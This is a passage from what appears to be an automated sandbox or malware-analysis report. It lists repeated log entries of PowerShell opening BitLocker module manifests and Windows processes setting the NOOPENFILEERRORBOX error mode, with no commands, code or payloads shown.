          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
